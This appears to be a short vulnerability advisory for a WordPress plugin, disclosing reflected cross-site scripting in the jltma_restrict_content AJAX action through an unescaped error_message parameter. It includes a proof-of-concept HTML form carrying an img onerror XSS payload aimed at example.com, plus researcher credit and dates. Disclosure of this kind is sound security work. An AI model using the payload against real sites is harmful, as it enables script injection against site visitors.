The plugin does not sanitise and escape the error_message parameter before outputting it back in the response of the jltma_restrict_content AJAX action, available to unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting
<html> <form action="https://example.com/wp-admin/admin-ajax.php?action=jltma_restrict_content" method="POST"> <input type="text" value="ma_el_rc_answer=x" name="fields"> <input type="text" value="math_captcha" name="restrict_type"> <input type="text" value="<img src onerror=alert(`XSS`)>" name="error_message"> <input type="submit" value="Send"> </form> </html>
Krzysztof Zając
Krzysztof Zając
Yes
2022-02-21 (about 11 months ago)
2022-02-21 (about 11 months ago)
2022-04-13 (about 9 months ago)